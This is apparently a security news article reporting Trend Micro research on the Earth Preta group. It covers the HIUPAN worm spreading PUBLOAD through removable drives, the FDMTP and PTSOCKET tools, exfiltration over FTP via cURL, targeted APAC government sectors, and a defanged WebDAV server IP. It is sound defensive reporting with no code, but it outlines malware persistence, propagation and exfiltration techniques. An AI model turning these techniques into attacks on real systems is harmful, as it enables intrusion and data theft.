Earth Preta, a notorious threat group, has been observed upgrading its attacks to distribute malware via removable drives, employing a variant of the worm HIUPAN. This campaign targets specific countries and sectors in the Asia-Pacific region, utilizing a combination of tools and techniques to achieve rapid deployment and data exfiltration.
Earth Preta Worm-based Attack Progression
Researchers from Trend Micro state that the HIUPAN worm most likely serves as a key component of Earth Preta’s attack chain, allowing the group to propagate PUBLOAD into targets’ networks via removable drives. HIUPAN’s configuration file contains essential information for its propagation and watchdog function, making it easier to set up and execute. Once launched, the HIUPAN installs a copy of itself on the victim’s system, and then creates an autorun registry entry to maintain persistence while modifying registry values to hide its presence.
PUBLOAD, the main control tool, collects system information, maps the network, and facilitates the delivery of additional tools, including FDMTP and PTSOCKET. FDMTP, a newly discovered hacking tool, is used to download and execute malware, while PTSOCKET serves as an exfiltration tool to upload collected data onto a remote server.
While spear-phishing emails were previously used to deliver PUBLOAD, the distribution of the HIUPAN malware through removable drives allows Earth Preta to target a wider range of victims and bypass certain security measures.
The countries that were likely targeted include Myanmar, the Philippines, Vietnam, Singapore, Cambodia and Taiwan, all located in the APAC region. Additionally, the decoy documents predominantly focus on topics related to government, particularly foreign affairs.
The HIUPAN worm variant used in these attacks is easier to configure, with an external config file that contains information for its propagation and watchdog function. HIUPAN’s watcher function periodically checks for the presence of removable and hot-pluggable drives, and if found, it will propagate to the removable drive, ensuring the continued spread of the malware.
PUBLOAD uses WinRAR to collect data from targeted files, encrypting and uploading the archived files to an attacker-owned FTP site using cURL. Alternatively, the PTSOCKET can be used for exfiltration purposes and to transfer files to attackers in multi-thread mode. Earth Preta’s collection and exfiltration activities are designed to be rapid and stealthy, making it essential for security teams to stay abreast of these evolving tactics.
Earth Preta Adaptations
Earth Preta has shown significant advancements in its malware deployment and attack strategies, particularly in campaigns that focused on government entities as targets, which include those in the military, police, foreign affairs agencies, welfare, the executive branch, and education in the APAC region.
The use of the tools like FDMTP and PTSOCKET severely enhance Earth Preta’s control and exfiltration capabilities while an earlier campaign in June demonstrates the use of multi-stage downloaders (from DOWNBAIT to PLUGX) and exploit of Microsoft’s cloud services for data exfiltration.
The quick turnover of decoy documents and malware samples on the WebDAV server hosted at 16[.]162[.]188[.]93 suggests that Earth Preta is executing highly targeted and time-sensitive operations, with focus on specific countries and industries within the APAC region, where researchers believe the group will continue to remain active.